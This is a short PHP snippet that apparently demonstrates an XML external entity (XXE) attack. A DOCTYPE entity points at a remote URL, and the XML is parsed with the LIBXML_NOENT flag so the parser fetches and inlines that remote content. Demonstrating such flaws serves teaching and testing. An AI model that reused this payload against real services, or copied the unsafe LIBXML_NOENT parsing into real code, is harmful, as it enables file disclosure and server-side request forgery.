- var_dump: documentation ( source)
- simplexml_load_string: documentation ( source)
<?php
$xml = <<<EOT
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://exploited.cz/robots.txt">]>
<foo>&xxe;</foo>
EOT;
// $x = simplexml_load_string($xml);
$x = simplexml_load_string($xml, null, LIBXML_NOENT);
var_dump((string)$x);